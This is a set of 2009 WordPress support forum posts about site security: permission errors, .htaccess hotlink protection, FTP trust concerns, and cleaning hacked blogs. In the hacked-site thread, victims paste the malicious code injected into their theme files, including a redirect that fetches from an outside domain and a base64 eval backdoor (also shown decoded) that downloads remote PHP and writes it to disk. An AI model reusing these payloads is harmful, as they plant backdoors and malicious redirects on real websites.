http://wordpress.org/support/ WordPress › Support Tag: security en Tue, 24 Nov 2009 13:09:20 +0000 http://wordpress.org/support/topic/335003#post-1291851 Tue, 24 Nov 2009 04:45:22 +0000 zylstra5 1291851@http://wordpress.org/support/ <p>I am receiving this error:<br /> "You do not have sufficient permissions to access this page."</p> <p>This happened after I installed WP Security Scan (Link: <a href="http://semperfiwebdesign.com/plugins/wp-security-scan/" rel="nofollow">http://semperfiwebdesign.com/plugins/wp-security-scan/</a> ) and then ran a utility that changes your database prefix.<br /> Soon after successfully updating the prefix, this message appeared.</p> <p>I googled this question, and found such a variety of answers. It seems many people had this issue with updating, but that is not what I did so I figured it would be best to ask here.</p> <p>This seems to be a fairly prominent issue with this plugin... it is featured on Wordpress and possibly should be removed until these types of bugs are fixed. </p> <p>I have tried reinstalling Wordpress (just the files, nothing with the database). I do have a backup of the database, but for further reasons that would take too long to explain, I would like to avoid this. Last resort. </p> http://wordpress.org/support/topic/295482/page/3#post-1290334 Sun, 22 Nov 2009 21:03:49 +0000 derek23 1290334@http://wordpress.org/support/ <p>Hi</p> <p>This has just hit me as well and I really haven't got a clue what to do, I'm not a techie.</p> <p>Can someone talk me through this in English please?</p> <p>Derek </p> http://wordpress.org/support/topic/272090#post-1289622 Sat, 21 Nov 2009 23:54:54 +0000 buhle78 1289622@http://wordpress.org/support/ <blockquote> <p>In the above example the first line disables file directory listings (so no one can view the files in the 'uploads' or any of its subdirectories. The line with HTTP_REFERER makes sure linking to a particular file is coming from my site. The gif|png|jpg|doc|xls|pdf|html|htm|xlsx|docx) is a list of filetypes I want to prevent from being directly linked to (unless they are clicking from my site).</p> <p>Sorry this doesn't use a plugin to solve this (maybe I should write one?), but this seems to do the trick. Hope it helps. </p></blockquote> <p>The problem is people download MP3s how can this solved. Today i realised that google actually indexed an MP3 and i managed to download it using Firefox. What do i add on the .htaccess to stop search engines from going in there. How can i hide the files?</p> <p>Please help </p> http://wordpress.org/support/topic/333539#post-1288591 Fri, 20 Nov 2009 21:29:36 +0000 esmi 1288591@http://wordpress.org/support/ <p>It's normally safe. WordPress needs to know ftp details so it can transfer updated files to your server. </p> http://wordpress.org/support/topic/333539#post-1288484 Fri, 20 Nov 2009 19:48:27 +0000 web2.0 1288484@http://wordpress.org/support/ <p>Oops ... i didn't got that exactly .. which script is working behind ... wordpress or plugin ... but my concern is ... giving ftp information while updating/installing plugins is safe or not ? </p> <p>specially when user like me don't know what is the code running behind .... how can one decide that ftp information will only used to upgrade the plugin .. and it 'll not cause any security threat ??? </p> http://wordpress.org/support/topic/333006#post-1288357 Fri, 20 Nov 2009 18:20:44 +0000 talgalili 1288357@http://wordpress.org/support/ <p>samboll, whooami (and others in the future)<br /> I started doing the procedure described on:<br /> <a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/" rel="nofollow">http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/</a></p> <p>In order to backup my entire file system, I found the following SSH shell code to zip all my files up:<br /> zip -r downloadme.zip *<br /> And now I am downloading this file.<br /> After that I will erase and then reinstall all the files for my blog.</p> <p>If any one has a tip for mass uploading new plugins to the blog, that will be nice :)</p> <p>Tal </p> http://wordpress.org/support/topic/272090#post-1287619 Fri, 20 Nov 2009 01:40:40 +0000 wwhitehead 1287619@http://wordpress.org/support/ <p>Not sure if this helps, but I was having a similar issue and in lieu of finding a plugin that solved this problem, I simply used the <a href="http://wordpress.org/extend/plugins/force-user-login/">Force User Login</a> plugin and then created a .htaccess file in my 'uploads' directory to prevent direct hot-linking to any file within that directory and its subdirectories <em>not</em> coming directly from my 'Members Only' site. This way, only logged in users can access content within the uploads directory, and only when directly linked from my site. Otherwise direct linking re-directs the user to another site. Does this make sense?</p> <p>Here's an example .htaccess file you'd want to create and place in your 'wp-content/uploads' directory:<br /> <pre><code>IndexIgnore * Options +FollowSymlinks RewriteEngine On RewriteCond %{HTTP_REFERER} !^http://(www\.)?myprotectedmemberssite\.com/ [NC] RewriteCond %{REQUEST_URI} !hotlink\.(gif|png|jpg|doc|xls|pdf|html|htm|xlsx|docx) [NC] RewriteRule .*\.(gif|png|jpg|doc|xls|pdf|html|htm|xlsx|docx)$ <a href="http://yahoo.com/" rel="nofollow">http://yahoo.com/</a> [NC]</code></pre> <p>In the above example the first line disables file directory listings (so no one can view the files in the 'uploads' or any of its subdirectories. The line with HTTP_REFERER makes sure linking to a particular file is coming from my site. The gif|png|jpg|doc|xls|pdf|html|htm|xlsx|docx) is a list of filetypes I want to prevent from being directly linked to (unless they are clicking from my site).</p> <p>Sorry this doesn't use a plugin to solve this (maybe I should write one?), but this seems to do the trick. Hope it helps. </p> http://wordpress.org/support/topic/333539#post-1287491 Thu, 19 Nov 2009 23:30:21 +0000 esmi 1287491@http://wordpress.org/support/ <p>Are the plugins asking for ftp details or is WordPress? </p> http://wordpress.org/support/topic/333006#post-1287303 Thu, 19 Nov 2009 20:40:35 +0000 talgalili 1287303@http://wordpress.org/support/ <p>whooami - I deeply thank your replies and willingness to help with advices. I respect what you wrote and will look more into seeing how to fix the security holes I have.</p> <p>samboll - thanks for the pointers!</p> <p>Best to the two of you :)<br /> Tal </p> http://wordpress.org/support/topic/333539#post-1287052 Thu, 19 Nov 2009 17:29:39 +0000 web2.0 1287052@http://wordpress.org/support/ <p>Hi,</p> <p>I am new in wordpress community ... just started using it ... its really great.</p> <p>I have added plugins in my blog, but that plugins are asking for ftp information, i guess, this is compulsory for making changes in code (to make plugin functional). But at the same time, its risky. Like someone makes a plugin, get ftp info and transfer(email) to himself.</p> <p>when ftp information is leaked, then one can do anything bad ...</p> <p>Comments please ... i might be wrong ... if not ... then how can i decide which plugin is useful and safe for me and which is not ???? </p> http://wordpress.org/support/topic/333006#post-1286781 Thu, 19 Nov 2009 13:09:12 +0000 samboll 1286781@http://wordpress.org/support/ <p><a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/" rel="nofollow">http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/</a></p> <p><a href="http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/" rel="nofollow">http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/</a> </p> http://wordpress.org/support/topic/333006#post-1286748 Thu, 19 Nov 2009 12:30:42 +0000 whooami 1286748@http://wordpress.org/support/ <blockquote><p>... but anything that uses POST I payed closer attention to. (mostly POST is just people logging into sites, but it was also how the command was sent that altered my file)</p> </blockquote> <p>web servers dont log _POST request variables (aka those commands). You can use my plugin if you want those.</p> <p>talgalili, </p> <p>I suspect but obviously cannot confirm that you are not taking care of the real problem. That you are seeing different symptoms doesnt do anything to dissuade me from that idea either.</p> <p>Im guessing you are picking through the solutions in the hopes of doing things quickly, rather than properly.</p> <p>I remember a thread, or so I thought it was you -- where you were excited to have learned a shortcut or something for grepping files. </p> <p>It might not have been you .. Im going on a very sleepy memory.</p> <p>I can tell you that I have "unhacked" hundreds of wordpress blogs, and have had <strong>one</strong> instance of a reoccurrance.. </p> <p>And your having 4 (at a minimum) -- points very strongly to either 1. you not doing a detailed enough job at making sure the site is clean or 2. you having an incredibly insecure host or 3. both</p> <p>Im inclined to go with 3 - only because I also remember whois'ing your domain and noticing that it was some odd european host (or so I thought at the time).</p> <p>That's all supposition and based only on what Ive read of your other threads and remember, and of course, my own personal experience. </p> http://wordpress.org/support/topic/333006#post-1286725 Thu, 19 Nov 2009 12:13:28 +0000 googol7 1286725@http://wordpress.org/support/ <p>hi,</p> <p>was the plugin exec-php installed?</p> <p>philipp </p> http://wordpress.org/support/topic/241058#post-1286390 Thu, 19 Nov 2009 04:07:38 +0000 klcarron 1286390@http://wordpress.org/support/ <p>Seeing that this is unresolved 9 months ago... any chance anyone knows the answer... I have this happening too. not related to SSL cert but likely the same resolution... ANYONE?? </p> http://wordpress.org/support/topic/333006#post-1286125 Wed, 18 Nov 2009 22:22:42 +0000 googol7 1286125@http://wordpress.org/support/ <p>hi,</p> <p>same problem here. files affected:</p> <p>/wp-content/themes/mytheme/404.php<br /> -rwxr-x--- 1 myuser nobody 409 2009-11-17 11:14 404.php</p> <p>New line at the top: <code>&lt;script&gt;location=&quot;&lt;?php $code = file_get_contents(&quot;http://feed-statistics.com/domain.php?q=b8add2a5d9&quot;); $code = str_replace(&quot;&lt;domain&gt;&quot;,&quot;&quot;, $code); $code = str_replace(&quot;&lt;/domain&gt;&quot;, &quot;&quot;, $code); echo $code; ?&gt;?pid=317&amp;sid=84dd6f&quot;;&lt;/script&gt;&lt;?php get_header(); ?&gt;</code></p> <p>/wp-content/themes/mytheme/header.php<br /> -rwxr-x--- 1 myuser nobody 1919 2009-11-18 21:33 header.php</p> <p>New line at the top: <code>&lt;script&gt;location=&quot;&lt;?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu(&quot;http://feed-statistics.com/domain.php?q=b8add2a5d9&quot;); $code = str_replace(&quot;&lt;domain&gt;&quot;, &quot;&quot;, $code); $code = str_replace(&quot;&lt;/domain&gt;&quot;, &quot;&quot;, $code); echo $code; ?&gt;?pid=317&amp;sid=84dd6f&quot;;&lt;/script&gt;&lt;!DOCTYPE html PUBLIC &quot;-//W3C//DTD XHTML 1.0 Transitional//EN&quot; &quot;http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd&quot;&gt;</code></p> <p>found malicious code in these files:</p> <p>/wp-content/plugins/wp-cache.php<br /> -rw-r----- 1 myuser nobody 4313 2009-10-08 05:56 wp-cache.php</p> <p>/wp-content/wp-manager.php<br /> -rw-r----- 1 myuser nobody 186780 2009-10-22 21:34 wp-manager.php</p> <p>/wp-content/plugins/stats/wp-stats.php</p> <p>had this content:</p> <p><code>&lt;?php eval(base64_decode(&#39;DQppZighJF9HRVRbInAiXSkgew0KICAgIGV4aXQ7DQp9DQoNCiRob3N0ID0gc3RyX3JlcGxhY2UoInd3dy4iLCAiIiwgJF9TRVJWRVJbIkhUVFBfSE9TVCJdKTsNCiRkYXRhPWc4NzQ2MjgzNDcyMzQoImh0dHA6Ly9teXdlYi1zdGF0aXN0aWNzLmNuL2ZtYW4vY2FjaGUucGhwP25ldz0xKTsNCiRmaCA9IGZvcGVuKCIuLi8uLi9jYWNoZS5waHAiLCAidyIpOw0KZndyaXRlKCRmaCwgJGRhdGEpOw0KZmNsb3NlICgkZmgpOw0KDQpmdW5jdGlvbiBnODc0NjI4MzQ3MjM0KCR1LCAkcCA9IGFycmF5KCkpew0KICAgICRjPWN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1VSTCwgJHUpOw0KICAgIGN1cmxfc2V0b3B0KCRjLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTsNCiAgICBjdXJsX3NldG9wdCgkYywgQ1VSTE9QVF9USU1FT1VULCA2MCk7DQogICAgJGg9Y3VybF9leGVjKCRjKTsNCiAgICBjdXJsX2Nsb3NlICgkYyk7DQogICAgcmV0dXJuICRoOw0KfQ0K&#39;)); ?&gt;</code></p> <p>which translates to:</p> <p><code>if(!$_GET[&quot;p&quot;]) { exit; } $host = str_replace(&quot;www.&quot;, &quot;&quot;, $_SERVER[&quot;HTTP_HOST&quot;]); $data=g874628347234(&quot;http://myweb-statistics.cn/fman/cache.php?new=1); $fh = fopen(&quot;../../cache.php&quot;, &quot;w&quot;); fwrite($fh, $data); fclose ($fh); function g874628347234($u, $p = array()){ $c=curl_init(); curl_setopt($c, CURLOPT_URL, $u); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_TIMEOUT, 60); $h=curl_exec($c); curl_close ($c); return $h; }</code></p> <p>philipp </p> http://wordpress.org/support/topic/333006#post-1285954 Wed, 18 Nov 2009 20:11:30 +0000 talgalili 1285954@http://wordpress.org/support/ <p>Hi RVoodoo,<br /> Folloing your advice, I just checked the log files of my hosting, and couldn't find any change to that file (including my own change to it!)</p> <p>I wonder why that is.</p> <p>Tal </p> http://wordpress.org/support/topic/333006#post-1285843 Wed, 18 Nov 2009 18:03:18 +0000 RVoodoo 1285843@http://wordpress.org/support/ <p>I'm not real sure about log files.... the one I looked at, my server file is just a big long list of absolutely anything that goes through my server.</p> <p>-any access, any file used, anything. So it shows POST, HEAD, GET and the file<br /> --there's about a million GET entries on it, but anything that uses POST I payed closer attention to. (mostly POST is just people logging into sites, but it was also how the command was sent that altered my file)</p> <p>-Basically, I'm not sure what different type of log files there are, but mine showed every single action involving any file through my server.....does your host not have that type? If they do, it'll definitely give you the information you are looking for </p> http://wordpress.org/support/topic/333006#post-1285835 Wed, 18 Nov 2009 17:55:35 +0000 talgalili 1285835@http://wordpress.org/support/ <p>Firstly I would like to thank all of you for your kind answers.</p> <p>Now from last to first:</p> <p>whooami -<br /> The issues I had there where of a different sort (to the best of my current understanding). In them I had the file "wp-header.php" altered, not "header.php".<br /> Also, that issue was working through a cache.php file located on another place. AND, I already (I believe) had found that leak and fixed it (deleting an added file), As I have mentioned in the threads I started there.<br /> If you think this is a symptom to a bigger problem, and have suggestions as to how to check it, I would be glad to know.</p> <p>RVoodoo -<br /> Thank you for the answer!<br /> I was hoping to do the exact same thing, but the hosting I use (site5) claimed that they can't detect which file was responsible for changing this file.<br /> Are they using a different log file for the server ?<br /> And leads on this will be great.</p> <p>alamster - thank you for your reply.</p> <p>bisforbo - very interesting - thank you for that tip, I'll see what I can do with it.</p> <p>Again, my thanks for all of you for taking the time to answer.<br /> Best,<br /> Tal </p> http://wordpress.org/support/topic/333006#post-1285575 Wed, 18 Nov 2009 13:55:39 +0000 whooami 1285575@http://wordpress.org/support/ <p><a href="http://wordpress.org/support/topic/285169?replies=9" rel="nofollow">http://wordpress.org/support/topic/285169?replies=9</a><br /> <a href="http://wordpress.org/support/topic/327460?replies=6" rel="nofollow">http://wordpress.org/support/topic/327460?replies=6</a><br /> <a href="http://wordpress.org/support/topic/295781?replies=2" rel="nofollow">http://wordpress.org/support/topic/295781?replies=2</a><br /> <a href="http://wordpress.org/support/topic/270938?replies=4" rel="nofollow">http://wordpress.org/support/topic/270938?replies=4</a></p> <p>talgalili,</p> <p>your issues appear to be ongoing. </p> http://wordpress.org/support/topic/333006#post-1285564 Wed, 18 Nov 2009 13:43:33 +0000 RVoodoo 1285564@http://wordpress.org/support/ <p>yup....a lot of time, you may have another php file on your server. ANYWHERE on your server. It could have been placed there months ago. It can be very hard to find if, like me, you run many sites off of your server. </p> <p>I found a file called test.php, and one called wp_setup.php I think. One of those files was in a subdomain that I have my online shop setup in, it was buried about 6 levels deep in a photo folder from 2008. Another of those files was in a totally different wordpress install. But they were both used as backdoors to my main wp install only.</p> <p>I found them by checking the timestamp of my header.php file, which showed me when it had been altered. I checked my server logs to find that exact time, which showed me my header.php file being altered through the above files, and showed me where they were located.</p> <p>There are many ways to hack a site, but the one I listed was the most recent one I've dealt with...... </p> http://wordpress.org/support/topic/333006#post-1285550 Wed, 18 Nov 2009 13:32:00 +0000 alamster 1285550@http://wordpress.org/support/ <p>I try to answer :</p> <p>1. The address they try to inject is 'attack site' (I run it on firefox)<br /> <a href="http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=http://everlastmovie.cn/?pid=317&amp;sid=84dd6f" rel="nofollow">http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&amp;hl=en-US&amp;site=http://everlastmovie.cn/?pid=317&amp;sid=84dd6f</a><br /> 2. I ever get hacked too, after recheck all file I find out that wp theme I use already insert by a backdoor which make them easily enter another code to my blog (php shell). </p> http://wordpress.org/support/topic/333006#post-1285508 Wed, 18 Nov 2009 12:39:16 +0000 bisforbo 1285508@http://wordpress.org/support/ <p>The linked domain thing i'm not sure about. But... the way that I understand hacking works is by finding an entryway- a place where you should get a 404 page but then don't- and then you can see the file structure in the url bar. You then navigate around the website using that as your point of reference in a way that is similar to using terminal (on mac) (so like using / to go to root, etc.) . So what I would do, is if you have google analytics, look for a page that only one person has been to, that you've never seen before. Navigate to that page and then see if you get a 404. if you don't get a 404 and it says something about your server, then the mystery is solved. If you do get a 404 then i don't know, and if you get a normal page then check your content and what it links to. </p> http://wordpress.org/support/topic/333006#post-1285369 Wed, 18 Nov 2009 08:16:38 +0000 talgalili 1285369@http://wordpress.org/support/ <p>Hi there,</p> <p>My blog's header.php (in the theme directory), has been hacked and the code inserted to it was:</p> <p>&lt;script&gt;location="&lt;?php function getu($u, $p = array ()) { $c = @curl_init();if ($p) { @curl_setopt($c, CURLOPT_POST, 1); @curl_setopt($c, CURLOPT_POSTFIELDS, $p); } @curl_setopt($c, CURLOPT_URL, $u); @curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); @curl_setopt($c, CURLOPT_TIMEOUT, 30); $h = @curl_exec($c); @curl_close($c); return $h; } $code = getu("http://feed-statistics.com/domain.php?q=b8add2a5d9"); $code = str_replace("&lt;domain&gt;", "", $code); $code = str_replace("&lt;/domain&gt;", "", $code); echo $code; ?&gt;?pid=317&amp;sid=84dd6f";&lt;/script&gt;</p> <p>I wonder if:<br /> 1) can I report the linked to domain somehow ?<br /> 2) My FTP log files don't show any FTP action taken on the file. Does anyone know of more ways someone might make this change ?</p> <p>Thanks,<br /> Tal </p> http://wordpress.org/support/topic/332354#post-1284024 Tue, 17 Nov 2009 04:06:24 +0000 bottleneck 1284024@http://wordpress.org/support/ <p>You didn't make a one step further just to find it out.</p> <blockquote><p>Please type is waterskiandwakeboardworldcup into google and see top result for waterskiandwakeboardworldcup.com</p> </blockquote> <p>Click on "cached" and see what's there.</p> <p>This is for your reference:<br /> <a href="http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/">http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/</a></p> <p><a href="http://codex.wordpress.org/FAQ_My_site_was_hacked">http://codex.wordpress.org/FAQ_My_site_was_hacked</a> </p> http://wordpress.org/support/topic/332354#post-1283308 Mon, 16 Nov 2009 17:06:48 +0000 amprodesign 1283308@http://wordpress.org/support/ <p>hey please help.<br /> Please type is waterskiandwakeboardworldcup into google and see top result for waterskiandwakeboardworldcup.com<br /> This is an ad for canadian drug company, nothing to do with our site Please can somebody help me, what has happened here?<br /> Thanks<br /> Andy </p> http://wordpress.org/support/topic/332006#post-1282111 Sun, 15 Nov 2009 15:33:00 +0000 pdliles 1282111@http://wordpress.org/support/ <p>When I upgraded to Word Press 2.8.6. all of the images I had associated with Pro-Player playing .flv files went black? </p> <p>The code I use for this page (http://lilesnet.com/dailydiary/?p=2633) is:</p> <p>[pro-player width='500' height='353' type='FLV' image='/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg']http://lilesnet.com/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia-OfficialTheatricalTrailer.flv[/pro-player]</p> <p>If I go to the directory the images are in and click the image, I can see it. If I VFR to the image directly (i.e. <a href="http://lilesnet.com/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg" rel="nofollow">http://lilesnet.com/dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg</a>) is get an error "You don't have permission to access /dailydiary/wp-content/dailydiary/uploads/2009/11/Amelia_earhart.jpg on this server."</p> <p>Very puzzled! Any ideas? </p> http://wordpress.org/support/topic/295482/page/3#post-1280476 Fri, 13 Nov 2009 19:22:04 +0000 roadsidephil 1280476@http://wordpress.org/support/ <p>I've had the same problem today. I found the malicious code in one of my plugins and removed. Also found it in the vars.php and removed it.</p> <p>I'm using version 2.8.2 </p> <p>Now two other things are happening. When I post a new entry from the main edit window, the resulting page is just a blank white one. The entry does post though. Same thing if updating an entry. Doesn't seem to do it from the quick edit page.</p> <p>Also, I wanted to updgrade to 2.8.6. When I click Upgrade Automatically it just says it's downloading the files but doesn't go any farther. </p> http://wordpress.org/support/topic/330895#post-1278898 Thu, 12 Nov 2009 16:44:04 +0000 esmi 1278898@http://wordpress.org/support/ <p>Site url? </p> http://wordpress.org/support/topic/330895#post-1278376 Thu, 12 Nov 2009 03:50:18 +0000 rubytuesday 1278376@http://wordpress.org/support/ <p>Hi all,</p> <p>I posted previously under another topic 'Why I am suddenly being flooded with spam?' about a sudden influx of spam that I've been getting.</p> <p>esmi kindly suggested since my problems were post-specific, the spam might be due to google rankings and added attention on the <a href="http://www." rel="nofollow">www.</a></p> <p>In my spam post, I made comment that my computer was infected with a virus yesterday and I'm running in safe mode until my o/s gets fixed.</p> <p>Now, I'm noticing that posts are disappearing from my homepage. The teasers of my oldest posts, which should be at the bottom of the page are moving upward as the teasers of my newer posts are disappearing from the homepage.</p> <p>Please help! Is this virus/hack/security related do you think, or as esmi suggested, perhaps a coincidence?</p> <p>Suggestions welcome! </p> http://wordpress.org/support/topic/241042#post-1278224 Thu, 12 Nov 2009 00:06:52 +0000 ballinascreen 1278224@http://wordpress.org/support/ <p>How about this:</p> <p><a href="http://wordpress.org/extend/plugins/stealth-login/" rel="nofollow">http://wordpress.org/extend/plugins/stealth-login/</a> </p>